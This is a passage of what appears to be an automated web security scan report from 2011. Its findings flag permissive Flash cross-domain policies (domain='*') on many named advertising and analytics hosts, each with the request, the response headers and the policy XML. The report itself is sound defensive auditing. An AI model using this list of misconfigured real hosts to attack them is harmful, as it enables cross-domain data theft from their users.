<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.8. http://c.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:26:25 GMT
ETag: "14b0e12-e6-e7eb640"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 00:58:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:58:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.9. http://cdn.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain. The rules shown grant that access separately for ports 80 and 443, and the port-443 rule carries secure="false", which lets a SWF loaded over plain HTTP use the policy for HTTPS content.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 00:52:13 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.10. http://cdn.taboolasyndication.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:13 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 02 Jan 2011 13:38:59 GMT
ETag: "578002-199-498dd2859a2c0"
Accept-Ranges: bytes
Content-Length: 409
Content-Type: text/xml
Cache-Control: private, max-age=31536000
Age: 20954886
Expires: Wed, 04 Jan 2012 12:01:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.11. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Sun, 04 Sep 2011 00:55:27 GMT
Date: Sun, 04 Sep 2011 00:55:27 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.12. http://ce.lijit.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ce.lijit.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:58:09 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n15.panthercdn.com
ETag: "7955a-83-4aad025722640"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 13:20:56 GMT
Age: 128233
Content-Length: 131
Content-Type: application/xml
Last-Modified: Thu, 18 Aug 2011 23:41:05 GMT
Connection: close

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.13. http://gannett.gcion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.14. http://get.lingospot.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://get.lingospot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: get.lingospot.com

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "-1221676599"
Last-Modified: Tue, 02 Dec 2008 06:03:41 GMT
Content-Length: 139
Date: Sun, 04 Sep 2011 01:08:26 GMT
Server: lingo

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.15. http://gscounters.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2d6b"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web204
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:52:28 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.16. http://i.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 00:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:53:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.17. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 00:57:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 00:57:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.18. http://img-cdn.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 00:55:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.19. http://img.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:49 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.20. http://imp.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.21. http://init.lingospot.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://init.lingospot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: init.lingospot.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=7200
Content-Type: text/xml
Etag: "-5d35a762ba6b2244"
Last-Modified: Mon, 09 May 2011 16:03:41 GMT
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:54:31 GMT
Server: Google Frontend

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.22. http://l.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=315360000, public
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:59:03 GMT
ETag: "4e4ed5c4=cf"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Last-Modified: Fri, 19 Aug 2011 21:29:40 GMT
Server: Cherokee
Content-Length: 207
Connection: Close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-p
...[SNIP]...

6.23. http://m.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 00:55:53 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.24. http://metrics.sprint.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Omniture DC/2.0.0
xserver: www372
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.25. http://nmsacramento.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmsacramento.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: nmsacramento.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:37 GMT
Server: Omniture DC/2.0.0
xserver: www411
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.26. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:49:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.27. http://pixel.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6804 26628
Set-Cookie: ts=1315097793; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:56:33 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.28. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 01:00:45 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 01:00:45 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.29. http://premium.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: premium.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT
ETag: "d4820b-d0-48821fe531a40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.30. http://query.yahooapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://query.yahooapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: query.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 01:10:48 GMT
Server: YTS/1.19.8
Age: 1

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

6.31. http://r.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:23:18 GMT
ETag: "1ad8fc9-e6-3595180"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 00:56:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:56:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.32. http://r.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 00:47:36 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.33. http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcv-srv48.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rcv-srv48.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1314384909000"
Last-Modified: Fri, 26 Aug 2011 18:55:09 GMT
host: rcv-srv48
Content-Type: application/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 00:45:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.34. http://s.meebocdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.meebocdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.meebocdn.net

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 03 May 2011 00:23:33 GMT
ETag: "3934951678"
Server: lighttpd/1.4.19
Content-Type: text/xml
Cache-Control: max-age=163863
Expires: Mon, 05 Sep 2011 22:41:27 GMT
Date: Sun, 04 Sep 2011 01:10:24 GMT
Content-Length: 348
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" secure="False"/>
<allow-access-from domain="*.meebo.com" secure="False"/>
<allow-http-request-headers-from domain="*.meebo.com" headers="*"/>
<allow-access-from domain="*.meebocdn.net" secure="False"/>
...[SNIP]...

6.35. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 03 Sep 2011 23:21:26 GMT
Expires: Fri, 02 Sep 2011 23:16:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5440
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.36. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:58:35 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:58:35 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.37. https://socialize.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://socialize.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: socialize.gigya.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:0"
Server: Microsoft-IIS/7.5
X-Server: web517
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
